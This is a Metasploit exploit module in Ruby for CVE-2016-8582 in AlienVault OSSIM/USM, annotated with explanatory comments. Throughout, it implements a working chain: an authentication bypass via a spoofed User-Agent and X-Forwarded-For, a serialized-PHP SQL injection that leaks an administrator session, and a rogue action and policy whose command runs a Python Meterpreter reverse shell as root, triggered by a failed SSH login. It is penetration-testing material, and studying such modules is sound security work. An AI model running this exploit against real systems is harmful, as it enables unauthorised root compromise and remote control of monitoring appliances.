##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# AlienVault OSSIM/USM unauthenticated remote code execution (CVE-2016-8582, EDB 40682).
#
# The chain visible in the requests below is:
#   1. gauge.php accepts a serialized PHP value whose injected
#      extractvalue() call leaks one row of the `sessions` table (an
#      administrator PHPSESSID) through an XPATH error message; the
#      description calls this the authentication bypass + object injection
#      + SQL injection step.
#   2. With that session cookie, a rogue "action" is created whose
#      exec_command runs the Python payload, and a "policy" is created that
#      references the action; policies are then reloaded.
#   3. A deliberately failing SSH password login as root is performed; the
#      comments below state this is what triggers the policy (and so the
#      action) on the appliance.
#
# Every HTTP request carries either User-Agent "AV Report Scheduler" or the
# target's own address in X-Forwarded-For (or both); those are the
# recognizable artifacts of this module in web-server logs.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SSH

  # Module metadata and options (TARGETURI, RPORT). SSL is on by default;
  # the payload is Python because the rogue action runs `python -c`.
  def initialize(info={})
    super(update_info(info,
      'Name' => "AlienVault OSSIM/USM Remote Code Execution",
      'Description' => %q{
        This module exploits object injection, authentication bypass and ip spoofing vulnerabilities all together.
        Unauthenticated users can execute arbitrary commands under the context of the root user.

        By abusing authentication bypass issue on gauge.php lead adversaries to exploit object injection vulnerability
        which leads to SQL injection attack that leaks an administrator session token. Attackers can create a rogue
        action and policy that enables to execute operating system commands by using captured session token. As a final step,
        SSH login attempt with an invalid credentials can trigger a created rogue policy which triggers an action that executes
        operating system command with root user privileges.

        This module was tested against following product and versions:
        AlienVault USM 5.3.0, 5.2.5, 5.0.0, 4.15.11, 4.5.0
        AlienVault OSSIM 5.0.0, 4.6.1
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Peter Lapp', # EDB advisory owner
          'Mehmet Ince <[email protected]>' # Metasploit module
        ],
      'References' =>
        [
          ['CVE', '2016-8582'],
          ['URL', 'https://pentest.blog/unexpected-journey-into-the-alienvault-ossimusm-during-engagement/'],
          ['EDB', '40682']
        ],
      'DefaultOptions' =>
        {
          'SSL' => true,
          # Longer-than-usual wait for the session: the payload is not run by
          # the final request itself but by the policy engine afterwards
          # (presumably asynchronously — not confirmed here).
          'WfsDelay' => 10,
          'Payload' => 'python/meterpreter/reverse_tcp'
        },
      'Platform' => ['python'],
      'Arch' => ARCH_PYTHON,
      'Targets' =>
        [
          ['Alienvault USM/OSSIM <= 5.3.0', {}]
        ],
      'Privileged' => true,
      'DisclosureDate' => '2017-01-31',
      'DefaultTarget' => 0
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/'])
      ])
  end


  # Vulnerability check that reads no application data: the injected
  # extractvalue() only echoes a random marker back inside the XPATH error.
  #
  # @return [Exploit::CheckCode] Vulnerable only when the exact marker is
  #   reflected in a 200 response; any other outcome, including no response
  #   at all, is reported as Safe.
  def check
    r = rand_text_alpha(15)
    # s:69 is the byte length of the quoted string (54 fixed characters plus
    # the 15 from r); the serialized length must match the string exactly,
    # which is why `exploit` computes it from sql.length instead.
    p = "a:1:{s:4:\"type\";s:69:\"1 AND extractvalue(rand(),concat(0x3a,(SELECT '#{r}')))-- \";}"

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
      'headers' => {
        # The User-Agent-based authentication bypass for gauge.php (see the
        # comment on getaction.php below for where it does not apply).
        'User-Agent' => 'AV Report Scheduler',
      },
      'vars_get' => {
        'type' => 'alarm',
        'wtype' => 'foo',
        'asset' => 'ALL_ASSETS',
        'height' => 1,
        'value' => p
      }
    })

    if res && res.code == 200 && res.body =~ /XPATH syntax error: ':#{r}'/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end

  end


  # Runs the full chain described on the class. Each step aborts the module
  # via fail_with when its response does not match, so later steps can rely
  # on cookie, action_id, policy_ctx and policy_group being set.
  #
  # @return [nil] on an unexpected SSH error; otherwise the return value is
  #   not meaningful (the payload is started by the appliance's policy engine).
  def exploit
    # Step 1: hijack an administrator session. The same object-injection /
    # SQL-injection entry point as `check`, but the subquery now reads a
    # session id; the marker is delimited with ':::' so the regex below can
    # capture it.
    print_status("Hijacking administrator session")

    sql = "SELECT id FROM sessions LIMIT 1"
    # 58 = fixed characters around the subquery; see the note in `check`.
    p = "a:1:{s:4:\"type\";s:#{(sql.length + 58).to_s}:\"1 AND extractvalue(rand(),concat(0x3a3a3a,(#{sql}),0x3a3a3a))-- \";}"

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'ossim', 'dashboard', 'sections', 'widgets', 'data', 'gauge.php'),
      'headers' => {
        # The target's own address is sent as the client IP — the "ip
        # spoofing" part of the description. Why the appliance honours this
        # header is not visible from the module.
        'X-Forwarded-For' => rhost.to_s,
        'User-Agent' => 'AV Report Scheduler',
      },
      'vars_get' => {
        'type' => 'alarm',
        'wtype' => 'foo',
        'asset' => 'ALL_ASSETS',
        'height' => 1,
        'value' => p
      }
    })
    if res && res.code == 200 && res.body =~ /XPATH syntax error: ':::(.*):::'/
      admin_session = $1
      cookie = "PHPSESSID=#{admin_session}"
      print_good("Admin session token : #{cookie}")
    else
      # LIMIT 1 with no ordering: the module depends on at least one row
      # existing in `sessions` and assumes it belongs to an administrator.
      fail_with(Failure::Unknown, "Session table is empty. Wait until someone logged in and try again")
    end

    # Step 2: create an action whose exec_command is the payload. The random
    # name r is reused below to find the action's id in the listing.
    print_status("Creating rogue action")
    r = rand_text_alpha(15)

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'ossim', 'action', 'modifyactions.php'),
      'cookie' => cookie,
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
      },
      'vars_post' => {
        'id' => '',
        'action' => 'new',
        'old_name' => '',
        'action_name' => r,
        'ctx' => '',
        'old_descr' => '',
        'descr' => r,
        # Form field values below mirror the web UI's "execute command"
        # action; their individual semantics are not documented here.
        'action_type' => '2',
        'only' => 'on',
        'cond' => 'True',
        'email_from' => '',
        'email_to' => 'email;email;email',
        'email_subject' => '',
        'email_message' => '',
        'transferred_user' => '',
        'transferred_entity' => '',
        'exec_command' => "python -c \"#{payload.encoded}\""
      }
    })

    if res && res.code == 200 && res.body.include?("Action successfully updated")
      print_good("Action created: #{r}")
    else
      fail_with(Failure::Unknown, "Unable to create action")
    end

    # Step 3: look up the new action's id. The User-Agent authentication
    # bypass does not work for this endpoint, so the hijacked administrator
    # session is used instead.
    print_status("Retrieving rogue action id")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "ossim", "action", "getaction.php"),
      'cookie' => cookie,
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
      },
      'vars_get' => {
        'page' => '1',
        # presumably rows-per-page, chosen large so the new action is on
        # page 1 — not confirmed here.
        'rp' => '2000'
      }
    })

    if res && res.code == 200 && res.body =~ /actionform\.php\?id=(.*)'>#{r}<\/a>/
      action_id = $1
      print_good("Corresponding Action ID found: #{action_id}")
    else
      fail_with(Failure::Unknown, "Unable to retrieve action id")
    end

    # Step 4: scrape the ctx and group values the policy form requires; they
    # are taken from a getpolicy.php link on the policy page.
    print_status("Retrieving policy ctx and group values")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path.to_s, "ossim", "policy", "policy.php"),
      'cookie' => cookie,
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
      },
      'vars_get' => {
        'm_opt' => 'configuration',
        'sm_opt' => 'threat_intelligence',
        'h_opt' => 'policy'
      }
    })

    # Greedy (.*) captures: assumes a single getpolicy.php link on the page.
    if res && res.code == 200 && res.body =~ /getpolicy\.php\?ctx=(.*)\&group=(.*)',/
      policy_ctx = $1
      policy_group = $2
      print_good("CTX Value found: #{policy_ctx}")
      print_good("GROUP Value found: #{policy_group}")
    else
      fail_with(Failure::Unknown, "Unable to retrieve policy data")
    end

    # Step 5: create a policy that references the rogue action. Per the
    # original author it fires when an SSH authentication fails because of
    # a wrong password.
    print_status("Creating a policy that uses our rogue action")
    policy = rand_text_alpha(15)

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, "ossim", "policy", "newpolicy.php"),
      'cookie' => cookie,
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
      },
      'vars_post' => {
        'descr' => policy,
        'active' => '1',
        'group' => policy_group,
        'ctx' => policy_ctx,
        'order' => '1',
        'action' => 'new',
        # All-zero source/destination/mbox ids and port 0: the policy is
        # presumably meant to match any host and any port — not confirmed.
        'sources[]' => '00000000000000000000000000000000',
        'dests[]' => '00000000000000000000000000000000',
        'portsrc[]' => '0',
        'portdst[]' => '0',
        'plug_type' => '1',
        'plugins[0]' => 'on',
        # presumably the taxonomy filter for the failed-SSH-login event the
        # policy is meant to match — not confirmed here.
        'taxfilters[]' =>'25@2@0',
        'tax_pt' => '0',
        'tax_cat' => '0',
        'tax_subc' => '0',
        'mboxs[]' => '00000000000000000000000000000000',
        'rep_act' => '0',
        'rep_sev' => '1',
        'rep_rel' => '1',
        'rep_dir' => '0',
        'ev_sev' => '1',
        'ev_rel' => '1',
        # Time window: the policy is active every day, all day.
        'tzone' => 'Europe/Istanbul',
        'date_type' => '1',
        'begin_hour' => '0',
        'begin_minute' => '0',
        'begin_day_week' => '1',
        'begin_day_month' => '1',
        'begin_month' => '1',
        'end_hour' => '23',
        'end_minute' => '59',
        'end_day_week' => '7',
        'end_day_month' => '31',
        'end_month' => '12',
        'actions[]' => action_id,
        'sim' => '1',
        'priority' => '1',
        'qualify' => '1',
        'correlate' => '0',
        'cross_correlate' => '0',
        'store' => '0'
      }
    })

    # Only the status code is checked here; the response body is not
    # inspected, so a 200 with a validation error would still pass.
    if res && res.code == 200
      print_good("Policy created: #{policy}")
    else
      fail_with(Failure::Unknown, "Unable to create policy id")
    end

    # Step 6: reload all policies so the new one takes effect.
    print_status("Activating the policy")

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"),
      'cookie' => cookie,
      'headers' => {
        'X-Forwarded-For' => rhost.to_s,
      },
      'vars_get' => {
        'what' => 'policies',
        'back' => '../policy/policy.php'
      }
    })

    if res && res.code == 200
      print_good("Rogue policy activated")
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to enable rogue policy")
    end

    # Step 7: trigger the policy with an SSH password login for root that is
    # meant to fail (random password).
    # NOTE(review): the SSH port is hard-coded to 22 rather than exposed as
    # an option.
    opts = ssh_client_defaults.merge({
      auth_methods: ['password'],
      port: 22,
      password: rand_text_alpha(15)
    })

    print_status("Triggering the policy by performing SSH login attempt")

    begin
      Net::SSH.start(rhost, "root", opts)
    rescue Net::SSH::AuthenticationFailed
      # AuthenticationFailed is the expected, desired outcome.
      print_good("SSH - Failed authentication. That means our policy and action will be trigged..!")
    rescue Net::SSH::Exception => e
      # Any other SSH error (e.g. unreachable port) ends the module here;
      # note that an unexpectedly successful login falls through silently.
      print_error("SSH Error: #{e.class} : #{e.message}")
      return nil
    end

  end
end